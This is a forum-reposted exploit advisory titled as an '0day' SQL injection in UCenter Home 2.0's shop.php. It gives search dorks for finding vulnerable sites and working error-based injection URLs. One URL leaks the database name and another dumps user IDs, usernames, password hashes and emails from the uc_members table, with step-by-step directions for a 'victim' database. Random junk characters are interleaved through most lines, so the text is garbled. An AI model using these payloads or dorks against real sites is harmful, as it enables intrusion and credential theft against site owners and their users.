; B5 m7 z. ]. F( A) |1 H__--==UCenter Home 2.0 -(0day) Remote SQL Injection Vulnerability==--__
- S q# U, a) x& k! T F
" f) q4 K& s* @% X9 p ( a/ ?# H; S2 o; z) h7 d% {
/ p, w( g3 |4 K! Z' C8 e*/ Author : KnocKout 3 t( W- c u! Y1 ^. _
0 u5 F; S- J- M7 a7 s( P+ c5 ?1 v*/ Greatz : DaiMon,BARCOD3,RiskY and iranian hackers
" z+ r2 w/ o6 _1 S% C0 m; h) O6 c
*/ Contact: knockoutr@msn.com / H O h" g8 }, q. X {2 ]
4 l$ d% ? y! x*/ Cyber-Warrior.org/CWKnocKout 9 f: \ d0 ^. D) i
6 D6 ?8 `3 q3 k5 _
__--==__--==__--==__--==__--==__--==__--==__--==__--==__--== 3 r* k& K3 q" d
$ h( W: ]8 L2 }3 S" P' K& hScript : UCenter Home 1 ]4 P$ l0 d% {; O0 D. A
2 K' x" A: ]0 f+ B. p2 dVersion : 2.0
9 a I/ e; q) k& Q- t$ t9 g& c) l$ P5 f
Script HomePage : http://u.discuz.net/ 2 N7 A* b8 V3 o2 ]) s
) K( M$ B8 N5 L1 N0 g
__--==__--==__--==__--==__--==__--==__--==__--==__--==__--== ) Q+ S/ V0 R6 L% _; R3 q& n9 U
9 h% N) `, K7 tDork : Powered by UCenter inurl:shop.php?ac=view
. D$ B W4 x$ H8 R _4 U0 u4 @# Y7 F: U% s7 D& R
Dork 2 : inurl:shop.php?ac=view&shopid= # T" N$ I4 l4 ~! [
3 Z f5 D4 [6 A. a" K9 u__--==__--==__--==__--==__--==__--==__--==__--==__--==__--== , d. L/ c. j8 s. B( [7 Q- e+ l/ K
( V! |- q6 u/ |8 T4 w1 f
Vuln file : Shop.php ' T/ ~" Y% s4 z+ s
+ Q2 r) a s' rvalue's : (?)ac=view&shopid=
+ b% c# k/ K/ w2 y
0 ^9 T/ s# z4 G" I& D5 u& wVulnerable Style : SQL Injection (MySQL Error Based)
" U: }7 l# a# ^9 s* c
& j$ U3 h5 s* s5 ]: b& ?$ H" dNeed Metarials : Hex Conversion
7 V( Z) {- g1 `; T% n
2 ?( V9 c$ a% |/ h T__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==
& Y1 T( p8 C( l* N4 R7 Y; ?- u4 W6 w. [# Q9 z
Your Need victim Database name.
( d V1 ^$ Y* a$ y
& l- ~* T- ?" F4 t6 S) vfor Inject : http://server/shop.php?ac=view&shopid=253 and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,unhex(hex(database())),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
/ S6 t$ v4 T3 ?0 t: l# P% |7 n% x
7 w/ J) F. [3 P; N/ Y6 A/ f..
6 i' ~/ w/ p# [* ~' Z& Z$ ?. p+ L$ a, K9 J
DB : Okey.
9 a% w! |7 ^6 f7 ^: W( N3 a, a0 r+ g9 S, X! ], v
your edit DB `[TARGET DB NAME]`
* T+ i0 X3 b8 g2 c# x
/ I6 b4 l' o7 X0 T3 EExample : 'hiwir1_ucenter'
4 c/ ?" g: N' x# }. h. v* I
# o8 `" F0 S+ I5 LEdit : Okey.
9 Q; X; w1 ^% D6 Y
* {% ?7 z k! {% l8 Z3 h1 Q, RYour use Hex conversion. And edit Your SQL Injection Exploit..
7 } G& f2 e$ e# ? {3 @: D
- A+ P) ~# W( v) B% f* r
b8 f" W" B! B8 `' `0 t" ^0 N8 t
5 [& N9 R& I; p2 \: e/ S7 VExploit Code : http://server/shop.php?ac=view&shopid=253 253 and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,cast(concat(uc_members.uid,0x3a,uc_members.username,0x3a,uc_members.password,0x3a,uc_members.email) as char),0x27,0x7e) FROM `hiwir1_ucenter`.uc_members LIMIT 0,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
: u- i+ N: o( l5 k' T% R7 ] |
发表于 2013-2-27 21:31:31
收藏
分享
支持
反对